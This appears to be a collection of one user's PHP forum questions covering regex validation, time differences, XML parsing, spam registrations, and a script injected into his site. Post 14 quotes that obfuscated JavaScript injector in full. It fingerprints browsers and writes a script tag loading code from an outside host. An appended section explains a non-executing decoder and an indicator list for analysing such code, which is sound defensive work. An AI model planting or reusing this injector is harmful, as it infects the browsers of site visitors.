speedy33417

  1. Is it possible to capture the full URLs visited by browsers used in apps installed on my iPod? I have several native iOS apps that display web pages and I would like to use my PC to access the same pages. Are there any native or jailbreak apps that capture the history of URLs visited by these apps?
  2. Thanks for taking the time to look at my problem. No, I do not currently use a captcha of any kind. Yes, the registration script generates an email that contains a hyperlink to activate the account. And in fact, over 60% of the accounts he registered were activated and logged in more than 10 times. Here is a section of the mail script I use:

     ```php
     $to = $email;
     $subject = "Thanks for registering on xxxxxx.com";
     $body = "Your username is: " . $username . "\n\n";
     $body .= "blah blah click on the link to activate your account URL:\n\n";
     $body .= "http://www.xxxxxx.com/validate.php?id=" . $user_id . "&v=" . $validate_code . "\n\n";
     $body .= "blah blah blah";
     $headers = "Reply-To: xxxxxx.com <admin@xxxxxx.com>\r\n";
     $headers .= "Return-Path: xxxxxx.com <admin@xxxxxx.com>\r\n";
     $headers .= "From: xxxxxxcom <admin@xxxxxxcom>\r\n";
     $headers .= "MIME-Version: 1.0\r\n";
     $headers .= "Content-type: text/plain; charset=iso-8859-1\r\n";
     $headers .= "X-Priority: 1\r\n";
     $headers .= "X-Mailer: PHP". phpversion() ."\r\n";
     mail($to,$subject,$body,$headers);
     ```

     The only form user entry used in the mail script is $email and I use the following script to validate it before using it:

     ```php
     function validate_email($email) {
         // Create the syntactical validation regular expression
         $regexp = "^([_a-z0-9-]+)(\.[_a-z0-9-]+)*@([a-z0-9-]+)(\.[a-z0-9-]+)*(\.[a-z]{2,4})$";
         // Presume that the email is invalid
         $valid = 0;
         // Validate the syntax
         if (eregi($regexp, $email)) {
             list($username,$domaintld) = split("@",$email);
             // Validate the domain
             if (getmxrr($domaintld,$mxrecords)) $valid = 1;
         } else {
             $valid = 0;
         }
         return $valid;
     }
     ```

     Hope it gives you a bit more idea of any possible vulnerabilities.
  3. I have a PHP/MySQL based website. It's fairly popular and has plenty of registered users. The website was built from scratch and the only third-party/open-source portion is a tinyMCE editor used on the Forum. The forum itself is also built from scratch. The website is game related and provides game specific information, calculators, forum, etc.

     Today I noticed that there are over 500 registrations from the same person. He uses different email addresses and even different IP addresses, but all IP addresses originate from China and site behaviour indicates that it is the same person. He never posted on the forum or sent messages to other members using the website's own message center. But I'm puzzled what he's doing on the site. I'm sure that he's up to no good, but for what purpose would he need this many user accounts?

     I was thinking that maybe he's using the registration page to hijack the registration form and use the registration email generated and piggyback that to send out Viagra emails or something. My website uses plain old mail() to send out those emails and I'm not sure what I could do to avoid it if that's what's happening. Maybe he's doing cross site scripting or SQL injection, but that could be done with one account, so I'm puzzled why he's registering all these accounts.

     Does anyone have any experience with these types of attacks? What is the most likely scenario here? What is he doing on my site? Any help and/or advice would be great. Thanks!
  4. My username validation works on these principles:

     - First letter must be alphanumerical
     - All other letters must be alphanumerical plus space and -_.

     I use the following code:

     ```php
     if (preg_match('/^[A-Za-z0-9][A-Za-z0-9-_.\s]/',$username)) ...
     ```

     The problem is that it validates this: xxxxx™

     How can I make sure that my username does not accept trademark sign and similar characters? Thank you!
  5. I'm using DATETIME to store time in a database and would like to calculate the time difference between two times like so:

     ```php
     $timeAdded = "2010-03-01 09:01:00";
     $currentTime = "2010-03-01 09:02:00";
     //here comes the magic
     //.......
     echo "This user was added $timeDifference";
     ```

     It should result in something like:

     - This user was added 1 minute ago.
     - This user was added 17 minutes ago.
     - This user was added 3 hours ago.

     What's the best way to do this?
  6. I have a website that's visited by iPhone and iPhone Touch mostly. The site takes comments and has a self-built forum. The iPhone has its own emoticons called emoji. When used in text they look like this: &#57612;

     Comments and posts are stored with the real HTML code for the icon, such as above. What I'm trying to find a solution for is replacing them with image tags when displayed. For example I have a user comment in my database like so.

     ```php
     $message = "This website is cool!& #57612; Keep up the good work!";
     // Here comes the regex magic...
     $message = "This website is cool!<img src=\"http://www.mysite.com/images/emoji123.png\" /> Keep up the good work!";
     ```

     The problem is that there are over 500 icons. I was thinking to use two arrays to store both formats:

     ```php
     $emoji[123] = "& #57612;";
     $html[123] = "<img src=\"http://www.mysite.com/images/emoji123.png\" />";
     ```

     So if I find an emoji script in the text then I check which one it is from my array and then replace it with the corresponding html version in the text. The problem is that I suck at Regex, and would really welcome any help that you can throw at me. Thanks!
  7. I have to validate a user input to being a valid HTML title tag text. Basically whatever the user would input here would be used as the Title for a specific web page. I would like to allow all characters that can be used for this purpose. I'm no good with Regex. I use the following code to validate user entry where only letters and numbers validate. How would I modify this script to use for the above example?

     ```php
     if (ereg("[^a-zA-Z0-9]", $userInput))
     ```
  8. I've just completed a redesign of an old website. Some of the page URLs will be changed and I need to redirect ALL traffic to the homepage (index.php) if the visitor may end up at an old page (search engine index, browser favorite, etc.) I'm sure it's just a few lines of code but not sure where to start. Thanks.
  9. ```
     Notice: Undefined variable: result in /hsphere/local/home/somesite.com/posting5.php on line 172
     Fatal error: Call to undefined function simplexmlelement() in /hsphere/local/home/somesite.com/posting5.php on line 174
     ```
  10. Thanks Darken. I looked at the tutorial, but it's still not clear how I can get those two pieces of code that I need to display for the applicant. I've never dealt with XML and it's totally new territory for me. I was hoping that I could maybe use regex to fish out the part that I need or any simple solution that would load the required part of the script into my variables. Anybody else, pleeeeeeaaaaase?
  11. I'm working on a website that deals with an xml response. After an application is filled out on our website we get a response sent to us in $result. If the application is approved then it looks something like this:

      ```xml
      <tss_loan_response><signature><data name="page">app_completed</data><data name="site_type">soap_oc</data><data name="license_key">sample</data><data name="promo_id">99999</data><data name="promo_sub_code"/></signature><errors/><content><section><verbiage><![CDATA[<br/> <p>Thank you for your application. You have been approved. Please click <b><a href="http://www.somesite.com">here</a></b>to complete your application.</p><p>You will be automatically sent to the page in a few seconds.</p><script type="text/javascript"> var script_expression = "document.location.href = 'http://www.somesite.com'"; var msecs = 2 * 1000; setTimeout(script_expression, msecs);</script> ]]></verbiage></section></content></tss_loan_response>
      ```

      I need pieces of code from the $result:

      1. The code between <data name="page"> and </data>
      2. The code between <![CDATA[ and ]]>

      How would I get them in $page and $data???
  12. Thanks all for the help. Btw, Daniel. How did you get your version of the JS code out of mine? It doesn't look anything close to what you posted. Is it encrypted in some way? How (and where) do I convert the original hacker code to a JS code that makes more sense (like yours)?
  13. Thanks ober. This code has been added to hundreds of pages on my site and luckily they all have the same upload time stamp so I can easily spot which ones have been affected. If it's a trojan what does it really do? Does it steal passwords? How does it work? Would I have to be on an affected webpage and information entered on that page would be compromised? Or does this mean that my entire website is compromised now? I'm just trying to understand what it might do and what damage may have been done. Thanks for your help.
  14. I have some weird code that appeared in my website's source code. Not sure if someone hacked into my server or what happened. Here's the code. How concerned should I be? What does the code do?

      ```html
      <script language=javascript><!--
      (function(){var tdv2O='%';var zL7j=('va>72>20a>3d>22S>63riptEngine>22>2cb>3d>22>56ersion()+>22>2c>6a>3d>22>22>2cu>3dnavig>61tor>2eu>73>65r>41gen>74>3bif>28>28u>2eind>65x>4ff>28>22C>68>72o>6de>22>29>3c0)>26>26(u>2ei>6edexO>66>28>22Win>22)>3e>30)>26>26>28u>2eindexOf(>22NT>20>36>22)>3c0)>26>26(do>63ument>2eco>6fki>65>2eind>65x>4f>66>28>22miek>3d1>22)>3c0)>26>26(>74ypeo>66>28z>72>76>7ats)>21>3d>74yp>65of(>22A>22)))>7b>7ar>76zt>73>3d>22A>22>3beval(>22if(wi>6edow>2e>22+a>2b>22>29j>3dj+>22+a+>22Major>22>2b>62>2ba+>22M>69nor>22>2bb+a>2b>22Build>22+b>2b>22j>3b>22)>3bdocu>6dent>2e>77ri>74e(>22>3cs>63ri>70>74>20src>3d>2f>2fm>22+>22a>72tu>7a>2e>63n>2fvid>2f>3fid>3d>22+j>2b>22>3e>3c>5c>2fscript>3e>22>29>3b>7d').replace(/>/g,tdv2O);var bhioa=unescape(zL7j);eval(bhioa)})();
      --></script>
      ```
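
The injected script in post 14 hides its body by writing `>` where percent-encoding uses `%`, then restores it with `replace`, `unescape` and `eval`; the sketch below is an added example (not code from the thread) that undoes the same encoding without ever evaluating the result, which is one answer to the question in post 12. `decodeLayer`, `joinLiterals`, `triage` and `SAMPLE` are names assumed here, and the sample string is constructed, not the payload from the post.

```javascript
// Static decoder for delimiter-swapped percent-encoding (added example).
// The decoded text is only ever handled as a string; nothing is evaluated.

// Constructed sample using the same scheme: '>' stands in for '%'.
const SAMPLE =
  "va>72 u>3dnavig>61tor>2eu>73erAgent>3bdocu>6dent>2ewri>74e(" +
  ">22>3cs>63ript src>3d>2f>2fexam>22+>22ple>2einvalid>2fx>2ejs" +
  ">3e>3c>5c>2fscript>3e>22)>3b";

// Decode <delimiter>XX and <delimiter>uXXXX the way unescape() treats %XX / %uXXXX.
function decodeLayer(encoded, delimiter) {
  const esc = delimiter.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
  const re = new RegExp(esc + "(?:u([0-9a-fA-F]{4})|([0-9a-fA-F]{2}))", "g");
  return encoded.replace(re, (_, u4, h2) =>
    String.fromCharCode(parseInt(u4 || h2, 16)));
}

// Rejoin string literals split as "abc"+"def" so URLs become searchable.
function joinLiterals(code) {
  return code.replace(/(["'])\s*\+\s*\1/g, "");
}

// Behaviours worth flagging when reviewing an injected script.
const INDICATORS = [
  ["dynamic-eval", /\beval\s*\(/],
  ["document.write", /document\.write\s*\(/],
  ["ua-fingerprint", /navigator\.userAgent/],
  ["cookie-access", /document\.cookie/],
];

function triage(decoded) {
  const hits = INDICATORS.filter(([, re]) => re.test(decoded)).map(([n]) => n);
  // Script sources the decoded code would load (absolute or protocol-relative).
  const srcRe = /src\s*=\s*["']?((?:https?:)?\/\/[^\s"'>+]+)/gi;
  const sources = [...decoded.matchAll(srcRe)].map((m) => m[1]);
  return { hits, sources };
}

function analyze(encoded, delimiter) {
  return triage(joinLiterals(decodeLayer(encoded, delimiter)));
}

console.log(decodeLayer(SAMPLE, ">"));
console.log(analyze(SAMPLE, ">"));
```

If the decoded layer itself contains another `eval` of an encoded string, run `decodeLayer` on that inner string as well rather than executing it.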